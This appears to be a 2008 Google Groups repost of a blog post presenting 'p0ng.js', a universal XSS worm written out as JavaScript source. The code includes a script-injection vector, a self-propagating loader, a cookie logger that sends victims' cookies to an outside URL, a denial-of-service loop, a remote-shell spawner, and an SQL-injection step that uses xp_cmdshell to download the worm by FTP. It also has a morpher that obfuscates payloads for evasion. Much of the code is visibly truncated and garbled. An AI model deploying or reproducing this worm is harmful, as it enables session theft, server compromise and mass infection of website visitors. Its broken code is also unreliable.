 |
From: 大风 <opensys...@gmail.com>
Date: Tue, 22 Jan 2008 10:03:55 +0800
Local: Mon, Jan 21 2008 9:03 pm
Subject: [zz] Writing A Modular Universal XSS Worm
After the diminutive XSS worm replication contest, I got the idea of writing How to propgate it: "><script src='http://www.acme.com/p0ng.js'></script> That's usually enough in most XSS holes. Really, besides tailoring the worm a couple of functionalities: - SQL injection - DOM Session & global storage (thanks Firefox) - Remote shells -shell.php? turns victims into new hosts- - Automatic form fillers - Javascript source code morpher - ...Tons of other useful features for a decent worm. The reason I wrote this universal worm was out of sheer fun. I don't care I hope you enjoy it, until next time: stay tuned and stay safe! /** * @name: +-+-+-+-+-+-+-+-+-+-+-+ P 0 N G ! +-+-+-+-+-+-+-+-+-+-+-+ * @file: p0ng.js * @author: 0x000000, Ronald van den Heetkamp & guests * @func: universal xss worm * @date: 2008.01.07 * **/ /*** string components ***/ String.prototype.urlencode = function(){ return encodeURIComponent(this); } String.prototype.xsplit = function(q,x) { b = this.split(q); return b[x]; } String.prototype.xor = function(n) { x = this; y = n; x ^ y; y = x ^ y; x = x ^ y; return x; } String.prototype.rand = function(n) { n ? n = parseInt(n) : n = 1024; return (Math.floor(Math.random () * n + 1 )); } String.prototype.zeroFill = function(d) { var str = this; while (str.length < d) { str = "0" + str; } return str; } String.prototype.getCharCodes = function() { var codes = []; for(var i=0; i<this.length;i++) { codes.push(this.charCodeAt(i)); } return codes; } String.prototype.toUnicode = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\u' + codes[i].toString(16).zeroFill(4); } return code; } String.prototype.toOctal = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\' + codes[i].toString(8); } return code; } String.prototype.toHex = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\x' + codes[i].toString(16); } return code; } /*** array components ***/ Array.prototype.in_array = function(str) { ret = false; for (i=(this.length-1); i>=0; i--) { if (this[i] == str) { ret = true; } } return ret; } /*** worm auto-append component ***/ function worm(uri) { w = document.createElement('script'); uri ? u = uri : u = window.location.href; w.src = u; try { document.getElementsByTagName('head')[0].appendChild(w); } catch(ex) { document.getElementsByTagName('body')[0].appendChild(w); } }; /*** worm XHR object ***/ function xhr() { var xhtp,xml,s; try { xhtp = new XMLHttpRequest(); s=true; } catch(ex) { xml = ['MSXML2.XMLHTTP','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.6.0','MSXML2.XMLHTTP.7.0']; for (i=(xml.length-1) && !s; i>=0; i--) { try { xhtp = new ActiveXObject(xml[i]); s=true; } catch(ex) { } } return xhtp; }; Object.prototype.post = function(uri,arg) { /*** usage: xhr().post('foo.php'); ***/ this.open('POST', uri, true); this.setRequestHeader('Content-type', this.setRequestHeader('Content-length', arg.length); this.setRequestHeader('Connection', 'close'); this.send(arg); }; Object.prototype.get = function(uri,argv) { /*** usage: xhr().get('foo.php'); ***/ this.open('GET',uri,true); this.send (argv); this.onreadystatechange = function () { if (this.readyState == 4) { if (this.status == 200) { var xmlget = this.responseText; } } }; this.send(argv); return xmlget; }; /*** DOM storage component ***/ Object.prototype.domstore = function(url,name,obj) { try { globalStorage[''].name=obj; s=false; } catch(ex) { url? sessionStorage.name = obj; s=true; } return s; }; /*** charset information ***/ Object.prototype.charset = function () { document.charset ? c = document.charset: c = false; return c; }; /*** event attach component ***/ Object.prototype.eventer = function(type,listener,useCapture) { try { this.addEventListener(type,listener,useCapture); ret = true; } catch(ex) { var ret = this.attachEvent('on' + type, ret = true; } return ret; }; /*** form submitting component ***/ Object.prototype.fillform = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { xform.elements[i].value = data; } } }; /*** form hiddenfield submitting component ***/ Object.prototype.fillhidden = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { if(xform.elements[i].type == 'hidden') { xform.elements[i].value = data; } } } }; /*** element array component ***/ Object.prototype.elements = function(arg) { var elems =[]; for (i=0;i<arg.length;i++) { var e = arg[i]; e = document.getElementById(e); elems.push(e); } return elems; }; /*** document links component ***/ Object.prototype.links = function() { rl = []; lk = document.links; for(y=0;y<lk.length;++y) { rl.push(lk[y]); } return rl; }; /*** query parts component ***/ Object.prototype.queryparts = function(uri) { k = []; uri?uri=uri:uri=window.location.href; (uri.indexOf('?')==-1)?i=0:i=1; if(i) { //uri = uri.search(/\?/) j = uri.split("&"); for(i=1;i<j.length;i++) { j[i] = j[i].replace(/=(.*)/,''); k.push(j[i]); } } else { k = 0; } return k; }; /*** cookie logger component ***/ Object.prototype.logcookie = function(uri) { var img = document.createElement('img'); document.appendChild(img); img.src = uri + "?c="+escape(document.cookie)+"q="+rand(); }; /*** color calculating component ***/ Object.prototype.visited = function(color) { c = color; if (this.currentStyle) { var x = this.currentStyle['color']; } else if (window.getComputedStyle) { var x = } if(c == x) { res = true; } else { res = false; } return res; }; /*** most clicked links estimater ***/ Object.prototype.estimate = function(color) { var link_array = []; for(i in links()) { if(i.visited(color)) { link_array.push(i); } } return link_array; } /*** denial of service trigger ***/ Object.prototype.dos = function() { this.onfocus = function() {d()} this.onblur = function() {d()} function d() { for(i=0;i<800;i++) { url = window.location.href; uri = document.location = url; if (!uri.closed && url.location) { document.location = url; } } } }; /*** remote shell spawning component ***/ Object.prototype.spawnshell = function(uri) { shell = uri + 'shell.php?'; var gateways = 'systempath','phpbb_root_path','returnpath','inc_dir','include','CONFIG[pat h 'mosConfig_absolute_path','basepath','configFile']; for(i=0;i<gateways.length;++i) { xhr().get(document.domain + '?',gateways[i] + '=' + } }; /*** hit & run shellspawner ***/ Object.prototype.hitandrun = function(uri) { shell = uri + 'shell.php?'; var gateways = []; var l = links(); for(j = 0; j < l.length; ++j) { gateways.push(queryparts(l[j])) } for(i = 0; i < gateways.length; ++i) { xhr().get(document.domain + '?',gateways[i] + } }; /*** SQL injecter component pOc ***/ Object.prototype.sqlinject = function(vuln_uri,ftpip) { seq = "1'; exec master..xp_cmdshell 'echo open "+ftpip+" 21 >> seq += "exec master..xp_cmdshell 'echo user foo bar >> seq += "exec master..xp_cmdshell 'echo get seq += "%systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo quit >> seq += "exec master..xp_cmdshell 'ftp -i -n -v -s: try { xhr().get(vuln_uri+seq) } catch(ex) { return false } }; /*** source morphing component ***/ String.prototype.toVariables = function() { var code = this; var operators = var operator = var number1 = Math.floor(Math.random()*10); var number2 = Math.floor(Math.random()*10); var statement = number1+operator+number2; var concatStr = ''; if(eval(statement) == true) {concatStr += statement; } else { concatStr += '!' + statement; } concatStr += "?'s1':0"; var customConcat = concatStr; var separateStatements = ','; var variablePrefixes = ['b2_','x2_','$_','x_','s_']; var pos = Math.floor(Math.random()*variablePrefixes.length); var varName = variablePrefixes[pos]; var vector = concatStr; var concatString = ''; for(var i=0; i<code.length;i++) { concatString += (varName + i + '=') + vector.replace("s1", } concatString += '' + varName + (i++) + '='; for(var i=0; i<code.length;i++) { concatString += (varName + i); if(i + 1 < code.length) { concatString += '+'; } } return concatString; } Object.prototype.morph = function(s) { var source = s; var m = var pos=Math.floor(Math.random() * m.length); morphtype = m[pos]; source = morphselection(source,morphtype); return; } switch(morphtype) { case "unicode":source = "eval('"+ source.toUnicode() case "charcodes":source = 'eval(String.fromCharCode(' case "octal":source = "eval('"+ source.toOctal() + case "hex":source = "eval('"+ source.toHex() + "')"; case "urlencode":source = "eval(unescape('"+ case "variables":source = source.toVariables(); } return source; }; Object.prototype.morphselection = function(source,morphtype) { switch(morphtype) { case "unicode":source = matchUnicode(source); break; case "octal":source = matchOctal(source); break; case "hex":source = matchHex(source); break; case "urlencode":source = matchUrlencode(source); case "charcodes":source = matchCharcodes(source); case "variables":source = matchVariables(source); } return source; }; Object.prototype.matchVariables = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $2.toVariables() } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $2.toVariables() } ); return source; }; Object.prototype.matchCharcodes = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + return source; }; Object.prototype.matchUrlencode = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'unescape(\'' + escape($2) source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'unescape("' + escape($2) + return source; }; Object.prototype.matchOctal = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); return source; }; Object.prototype.matchHex = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); return source; }; Object.prototype.matchUnicode = function(source) { source = source.replace(/(\\[uU][\w\d]{4})?(\w*)([\s(]?)/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } return source; }; [Ph4nt0m] <http://www.ph4nt0m.org/> [Ph4nt0m Security Team] <http://blog.ph4nt0m.org/> 刺@ph4nt0m Email: a...@ph4nt0m.org PingMe: === V3ry G00d, V3ry Str0ng === === Ultim4te H4cking === === XPLOITZ ! === === #_# === #If you brave,there is nothing you cannot achieve.#
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
| ||||||||||||||||
